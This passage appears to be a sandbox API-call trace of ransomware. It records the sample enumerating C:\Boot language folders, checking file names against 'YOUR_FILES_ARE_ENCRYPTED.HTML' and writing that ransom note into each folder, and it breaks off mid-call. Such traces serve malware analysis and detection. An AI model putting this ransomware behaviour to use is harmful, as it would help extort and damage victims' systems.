ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.043] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0155.043] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.043] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.043] lstrlenW (lpString=".mui") returned 4 [0155.043] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, 
ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.043] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.043] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.044] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\de-de\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.044] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.046] CloseHandle (hObject=0x4a4) returned 1 [0155.046] GetProcessHeap () returned 0x270000 [0155.048] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.048] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0155.048] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") 
returned 17 [0155.048] GetProcessHeap () returned 0x270000 [0155.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.048] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\el-GR" | out: lpString1="\\\\?\\C:\\Boot\\el-GR") returned="\\\\?\\C:\\Boot\\el-GR" [0155.048] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\*") returned="\\\\?\\C:\\Boot\\el-GR\\*" [0155.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", 
cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.049] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0155.049] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.049] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.049] lstrlenW (lpString=".mui") returned 4 [0155.049] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.049] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.049] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.050] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\el-gr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.050] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.052] CloseHandle (hObject=0x4a4) returned 1 [0155.052] GetProcessHeap () returned 0x270000 [0155.053] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.053] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0155.054] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0155.054] GetProcessHeap () returned 0x270000 [0155.054] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.054] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\en-US" | out: lpString1="\\\\?\\C:\\Boot\\en-US") returned="\\\\?\\C:\\Boot\\en-US" [0155.054] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*") returned="\\\\?\\C:\\Boot\\en-US\\*" [0155.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.054] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, 
ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.054] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.054] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0155.054] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.054] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.054] lstrlenW (lpString=".mui") returned 4 [0155.054] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.054] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x60, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0155.054] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0155.055] lstrcmpW (lpString1="memtest.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.055] 
PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0155.055] lstrlenW (lpString=".mui") returned 4 [0155.055] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0155.055] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x60, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0155.055] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.055] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.055] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.057] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.059] CloseHandle (hObject=0x4a4) returned 1 [0155.060] GetProcessHeap () returned 0x270000 [0155.061] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.061] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, 
ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0155.061] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0155.061] GetProcessHeap () returned 0x270000 [0155.061] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.061] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\es-ES" | out: lpString1="\\\\?\\C:\\Boot\\es-ES") returned="\\\\?\\C:\\Boot\\es-ES" [0155.061] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\*") returned="\\\\?\\C:\\Boot\\es-ES\\*" [0155.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.062] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.062] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: 
lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.062] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0155.062] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.062] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.062] lstrlenW (lpString=".mui") returned 4 [0155.063] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.063] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.063] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.063] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.063] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\es-es\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 
0x4a4 [0155.063] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.065] CloseHandle (hObject=0x4a4) returned 1 [0155.065] GetProcessHeap () returned 0x270000 [0155.066] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.066] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0155.066] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0155.066] GetProcessHeap () returned 0x270000 [0155.067] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.067] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\fi-FI" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI") returned="\\\\?\\C:\\Boot\\fi-FI" [0155.067] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\*") returned="\\\\?\\C:\\Boot\\fi-FI\\*" [0155.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.068] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.068] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.068] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0155.068] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.068] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.069] lstrlenW (lpString=".mui") returned 4 [0155.069] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, 
nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.069] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.069] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.069] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fi-fi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.069] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.071] CloseHandle (hObject=0x4a4) returned 1 [0155.071] GetProcessHeap () returned 0x270000 [0155.072] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.072] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec5544c0, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0155.072] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0155.072] GetProcessHeap () returned 0x270000 [0155.072] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.072] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\Fonts" | 
